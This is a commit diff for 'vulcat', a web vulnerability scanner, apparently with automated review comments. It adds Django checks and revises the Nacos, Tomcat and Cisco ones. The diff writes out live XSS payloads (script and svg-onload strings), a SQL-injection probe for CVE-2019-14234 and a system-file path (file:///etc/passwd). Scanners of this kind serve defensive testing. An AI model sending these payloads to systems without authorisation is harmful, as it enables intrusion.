

20220412-v1.0.1
CLincat committed Apr 12, 2022
1 parent 4880bf8 commit 7d6a376
Showing 15 changed files with 254 additions and 19 deletions.
7 changes: 5 additions & 2 deletions README.md
@@ -1,5 +1,5 @@
# vulcat
除了代码写得有亿点点烂等亿点点小问题以外,还是阔以的......吧
除了代码写得有亿点点烂, 误报率有亿点点高, 等亿点点小问题以外,还是阔以的......吧

* vulcat可用于扫描web端漏洞(框架、中间件、CMS等), 发现漏洞时会提示目标url和payload, 使用者可以根据提示对漏洞进行手工验证<br/>
* 使用者还可以自己编写POC, 并添加到vulcat中进行扫描, 本项目也欢迎大家贡献自己的POC(白嫖)
Expand All @@ -19,10 +19,13 @@
+---------------+------------------+------------+----------+------------------------------------------------------------+
| AlibabaNacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| ApacheTomcat | CVE-2017-12615 | WriteFile | PUT | PUT方法任意文件写入 |
| ApacheTomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD软件跨站脚本攻击 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS漏洞 |
| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield sql注入漏洞 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| Spring | CVE-2022-22965 | RCE | POST | Spring Framework远程代码执行 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE |
5 changes: 4 additions & 1 deletion README_en-us.md
Expand Up @@ -18,10 +18,13 @@
+---------------+------------------+------------+----------+------------------------------------------------------------+
| AlibabaNacos | CVE-2021-29441 | unAuth | GET/POST | 阿里巴巴Nacos未授权访问 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| ApacheTomcat | CVE-2017-12615 | WriteFile | PUT | PUT方法任意文件写入 |
| ApacheTomcat | CVE-2017-12615 | FileUpload | PUT | PUT方法任意文件写入 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| Cisco | CVE-2020-3580 | XSS | POST | 思科ASA/FTD软件跨站脚本攻击 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| Django | CVE-2017-12794 | XSS | GET | Django debug page XSS漏洞 |
| Django | CVE-2019-14234 | SQLinject | GET | Django JSONfield sql注入漏洞 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| Spring | CVE-2022-22965 | RCE | POST | Spring Framework远程代码执行 |
+---------------+------------------+------------+----------+------------------------------------------------------------+
| ThinkPHP | CNVD-2018-24942 | RCE | GET | 未开启强制路由导致RCE |
1 change: 1 addition & 0 deletions lib/core/coreScan.py
Expand Up @@ -9,6 +9,7 @@
from payloads.AlibabaNacos import nacos
from payloads.ApacheTomcat import tomcat
from payloads.Cisco import cisco
from payloads.Django import django
from payloads.ThinkPHP import thinkphp
# from payloads.Keycloak import keycloak
from payloads.Spring import spring
4 changes: 3 additions & 1 deletion lib/initial/config.py
Expand Up @@ -49,13 +49,15 @@ def __init__(self, args):
'Accept': '*/*',
'Connection': 'close'
}
if args.cookie:
args.headers['Cookie'] = args.cookie

args.proxies = {
'http': args.http_proxy,
'https': args.http_proxy
}

app_list = ['alidruid', 'cisco', 'thinkphp', 'tomcat', 'nacos', 'spring', 'weblogic', 'yonyou']
app_list = ['alidruid', 'cisco', 'django', 'thinkphp', 'tomcat', 'nacos', 'spring', 'weblogic', 'yonyou']
if args.application == 'all': # * -a参数
args.app_list = app_list
else:
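Review bot: The changed `app_list = ['alidruid', 'cisco', 'django', ...]` line is one of three hand-maintained copies of the supported-application list; the same commit edits the identical comma-joined string twice in lib/initial/language.py (`'name': 'AliDruid,cisco,django,thinkphp,...'`), so every new scanner needs three edits that can silently drift. Exporting the list once from config and building the help text with `','.join(app_list)` would keep them in sync. The new `args.headers['Cookie'] = args.cookie` branch is straightforward; `__init__` starts and ends outside the hunk.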
6 changes: 4 additions & 2 deletions lib/initial/language.py
Expand Up @@ -28,6 +28,7 @@ def language():
'timeout': 'Timeout/s (default: 10)',
'http_proxy': 'The HTTP/HTTPS proxy (e.g. --http-proxy 127.0.0.1:8080)',
'user_agent': 'Customize the User-Agent',
'cookie': 'Add a cookie',
'log': 'The log level, Optional 1-3 (default: 1)'
},
'application_help': {
Expand All @@ -48,7 +49,7 @@ def language():
},
'app_list_help': {
'title': 'Supported target types(Case insensitive)',
'name': 'AliDruid,cisco,thinkphp,tomcat,nacos,spring,weblogic,yonyou'
'name': 'AliDruid,cisco,django,thinkphp,tomcat,nacos,spring,weblogic,yonyou'
}
},
'zh_cn': {
Expand All @@ -67,6 +68,7 @@ def language():
'timeout': '超时时间/秒 (默认: 10)',
'http_proxy': 'http/https代理 (如: --http-proxy 127.0.0.1:8080)',
'user_agent': '自定义User-Agent',
'cookie': '添加cookie',
'log': '日志等级, 可选1-3 (默认: 1)'
},
'application_help': {
Expand All @@ -87,7 +89,7 @@ def language():
},
'app_list_help': {
'title': '支持的目标类型(-a参数, 不区分大小写)',
'name': 'AliDruid,cisco,thinkphp,tomcat,nacos,spring,weblogic,yonyou'
'name': 'AliDruid,cisco,django,thinkphp,tomcat,nacos,spring,weblogic,yonyou'
}
}
}
16 changes: 15 additions & 1 deletion lib/initial/list.py
Expand Up @@ -50,7 +50,7 @@ def list():
'ApacheTomcat': [
{
'vul_id': 'CVE-2017-12615',
'type': 'WriteFile',
'type': 'FileUpload',
'method': 'PUT',
'description': 'PUT方法任意文件写入'
}
Expand All @@ -63,6 +63,20 @@ def list():
'description': '思科ASA/FTD软件跨站脚本攻击'
}
],
'Django': [
{
'vul_id': 'CVE-2017-12794',
'type': 'XSS',
'method': 'GET',
'description': 'Django debug page XSS跨站脚本攻击'
},
{
'vul_id': 'CVE-2019-14234',
'type': 'SQLinject',
'method': 'GET',
'description': 'Django JSONfield sql注入'
}
],
# 'Keycloak': [
# {
# 'vul_id': 'CVE-2020-10770',
3 changes: 2 additions & 1 deletion lib/initial/parse.py
Expand Up @@ -18,7 +18,7 @@ def parse():
python3 vulcat.py -u https://www.example.com/ -a thinkphp --log 3
python3 vulcat.py -f url.txt -t 10
python3 vulcat.py --list
''', version='vulcat.py-1.0.0\n')
''', version='vulcat.py-1.0.1\n')
# * 指定目标
target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name'])
target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url'])
Expand All @@ -32,6 +32,7 @@ def parse():
optional.add_option('--timeout', type='int', dest='timeout', default=10, help=lang['optional_help']['timeout'])
optional.add_option('--http-proxy', type='string', dest='http_proxy', default=None, help=lang['optional_help']['http_proxy'])
optional.add_option('--user-agent', type='string', dest='ua', default='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0', help=lang['optional_help']['user_agent'])
optional.add_option('--cookie', type='string', dest='cookie', default=None, help=lang['optional_help']['cookie'])
optional.add_option('--log', type='int', dest='log', default=1, help=lang['optional_help']['log'])

# * 指定目标类型
5 changes: 4 additions & 1 deletion payloads/AlibabaNacos.py
Expand Up @@ -39,6 +39,9 @@ def __init__(self):
]

def cve_2021_29441_scan(self, url):
''' 阿里巴巴Nacos未授权访问漏洞
可以通过该漏洞添加nacos后台用户, 并登录nacos管理后台
'''
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'unAuthorized'
Expand Down Expand Up @@ -80,7 +83,7 @@ def cve_2021_29441_scan(self, url):
logger.logging(vul_info)
return None

if ('username' in res.text):
if (('pagesAvailable' in res.text) or ('"username":"nacos"' in res.text)):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
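Review bot: The widened condition `if (('pagesAvailable' in res.text) or ('"username":"nacos"' in res.text)):` reports the endpoint as unauthenticated whenever the body merely contains the generic pagination key `pagesAvailable`, which any paginated JSON reply — an empty listing or an error envelope included — may carry, and there is no status-code gate in front of it; this looks like a likely source of the false positives the README now admits to. Gating on `res.status_code == 200` and requiring a `username` entry in the body (the `'"username":"nacos"'` test, or a check that the listing is non-empty) would keep the check specific without losing the new case. cve_2021_29441_scan begins and ends outside the hunk.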
5 changes: 4 additions & 1 deletion payloads/ApacheTomcat.py
Expand Up @@ -32,9 +32,12 @@ def __init__(self):
]

def cve_2017_12615_scan(self, url):
''' Tomcat PUT方法任意文件写入漏洞
PUT方法可用, 上传未做过滤, 可以写入任意文件
'''
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'Write-File'
vul_info['vul_type'] = 'File-Upload'
vul_info['vul_id'] = 'CVE-2017-12615'
vul_info['vul_method'] = 'PUT'
vul_info['headers'] = {}
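Review bot: `vul_info['vul_type'] = 'File-Upload'` labels the finding differently from the `'type': 'FileUpload'` entry the same commit writes to lib/initial/list.py (and the README tables), so `--list` output and scan results name the same check inconsistently; the Nacos scanner shows the same drift with `'unAuthorized'` in the payload versus `unAuth` in the list. Pick one spelling and use it in both places, ideally by having the scanner read the type string from the same table list.py uses. cve_2017_12615_scan continues past the hunk.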
7 changes: 5 additions & 2 deletions payloads/Cisco.py
Expand Up @@ -26,11 +26,14 @@ def __init__(self):
self.cve_2020_3580_payloads = [
{
'path': '+CSCOE+/saml/sp/acs?tgname=a',
'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dalert(\'{}\')%3e'.format(self.md)
'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dalert(\'{}\')%3e'.format('3580')
}
]

def cve_2020_3580_scan(self, url):
''' Cisco ASA设备/FTD设备 XSS跨站脚本攻击
反射型
'''
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'XSS'
Expand Down Expand Up @@ -70,7 +73,7 @@ def cve_2020_3580_scan(self, url):
logger.logging(vul_info)
return None

if self.md in check.check_res(res.text, self.md):
if ("alert('3580')" in res.text):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
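Review bot: The marker `alert('3580')` now appears twice — URL-encoded inside the payload's `'data'` string and verbatim in `if ("alert('3580')" in res.text):` — with nothing tying the two together, so editing one without the other silently turns the scanner into a no-op; a single attribute such as `self.cve_2020_3580_marker = "alert('3580')"` referenced by both would avoid that. The previous `check.check_res(res.text, self.md)` used the md5-derived marker; a short fixed literal is more likely to match a WAF block page or cached response that quotes the request, so pairing the substring test with `res.status_code == 200` would help, though I cannot see from the hunk what check_res did beyond the substring test. cve_2020_3580_scan starts and ends outside the hunk.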
177 changes: 177 additions & 0 deletions payloads/Django.py
@@ -0,0 +1,177 @@
#!/usr/bin/env python3
# -*- coding:utf-8 -*-

'''
Django扫描类:
Django debug page XSS漏洞
CVE-2017-12794
Django JSONfield sql注入漏洞
CVE-2019-14234
file:///etc/passwd
file:///C:\Windows\System32\drivers\etc\hosts
'''

from lib.initial.config import config
from lib.tool.md5 import md5
from lib.tool.logger import logger
from lib.tool.thread import thread
from lib.tool import check
from thirdparty import requests

class Django():
def __init__(self):
self.timeout = config.get('timeout')
self.headers = config.get('headers')
self.proxies = config.get('proxies')

self.app_name = 'Django'
self.md = md5(self.app_name)
self.cmd = 'echo ' + self.md

self.cve_2017_12794_payloads = [
{
'path': 'create_user/?username=<ScRiPt>prompt(\'12794\')</sCrIpt>',
'data': ''
}
]

self.cve_2019_14234_payloads = [
{
'path': 'admin/vuln/collection/?detail__a%27b=123',
'data': ''
},
{
'path': 'vuln/collection/?detail__a%27b=123',
'data': ''
}
]

def cve_2017_12794_scan(self, url):
'''Django debug page XSS漏洞
构造url创建新用户, 同时拼接xss语句, 得到已创建的提示;
此时再次访问该链接(即创建同一个xss用户), 将触发恶意代码
'''
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'XSS'
vul_info['vul_id'] = 'CVE-2017-12794'
vul_info['vul_method'] = 'GET'
vul_info['headers'] = {}

headers = self.headers
headers.update(vul_info['headers'])

for payload in self.cve_2017_12794_payloads: # * Payload
path = payload['path'] # * Path
data = payload['data'] # * Data
target = url + path # * Target

vul_info['path'] = path
vul_info['data'] = data
vul_info['target'] = target

try:
res = requests.get(
target,
timeout=self.timeout,
headers=headers,
data=data,
proxies=self.proxies,
verify=False
)
vul_info['status_code'] = str(res.status_code)
logger.logging(vul_info) # * LOG
# * 该XSS漏洞较奇怪, 需要请求2次, 2次的payload必须一模一样
res = requests.get(
target,
timeout=self.timeout,
headers=headers,
data=data,
proxies=self.proxies,
verify=False
)
vul_info['status_code'] = str(res.status_code)
logger.logging(vul_info) # * LOG
except requests.ConnectTimeout:
vul_info['status_code'] = 'Timeout'
logger.logging(vul_info)
return None
except requests.ConnectionError:
vul_info['status_code'] = 'Faild'
logger.logging(vul_info)
return None

if ("prompt('12794')" in res.text):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
'Payload': {
'Url': url,
'Path': path
}
}
return results

def cve_2019_14234_scan(self, url):
''' Django JSONfield sql注入漏洞
需要登录, 并进入当前用户的目录下
'''
vul_info = {}
vul_info['app_name'] = self.app_name
vul_info['vul_type'] = 'SQLinject'
vul_info['vul_id'] = 'CVE-2019-14234'
vul_info['vul_method'] = 'GET'
vul_info['headers'] = {}

headers = self.headers
headers.update(vul_info['headers'])

for payload in self.cve_2019_14234_payloads: # * Payload
path = payload['path'] # * Path
data = payload['data'] # * Data
target = url + path # * Target

vul_info['path'] = path
vul_info['data'] = data
vul_info['target'] = target

try:
res = requests.get(
target,
timeout=self.timeout,
headers=headers,
data=data,
proxies=self.proxies,
verify=False
)
vul_info['status_code'] = str(res.status_code)
logger.logging(vul_info) # * LOG
except requests.ConnectTimeout:
vul_info['status_code'] = 'Timeout'
logger.logging(vul_info)
return None
except requests.ConnectionError:
vul_info['status_code'] = 'Faild'
logger.logging(vul_info)
return None

if (('ProgrammingError' in res.text) or ('Request information' in res.text)):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
'Payload': {
'Url': url,
'Path': path
}
}
return results

def addscan(self, url):
return [
thread(target=self.cve_2017_12794_scan, url=url),
thread(target=self.cve_2019_14234_scan, url=url)
]

django = Django()
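Review bot: `headers = self.headers` in cve_2017_12794_scan (and again in cve_2019_14234_scan) binds the dict obtained from `config.get('headers')` rather than copying it, so the following `headers.update(vul_info['headers'])` mutates the process-wide header set shared by every scanner thread; `vul_info['headers']` is empty today so the effect is latent, but `headers = {**self.headers, **vul_info['headers']}` removes the aliasing at no cost. The `except` clauses catch only `requests.ConnectTimeout` and `requests.ConnectionError`; a `requests.ReadTimeout` (server accepts the connection but never answers within `timeout`) is a `Timeout` but not a `ConnectionError`, so it escapes the handler and takes the worker thread down — catching `requests.Timeout` instead covers both. The CVE-2019-14234 match also accepts `'Request information' in res.text`, which is a section heading present on every Django DEBUG=True error page whatever raised it, so any 500 on a debug-enabled site will be reported as SQL injection; requiring the `'ProgrammingError'` text on its own would cut that false positive. `self.cmd` and the `check` import are unused in this class, and passing `data=data` to `requests.get` sends an (empty) body on a GET for no benefit.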
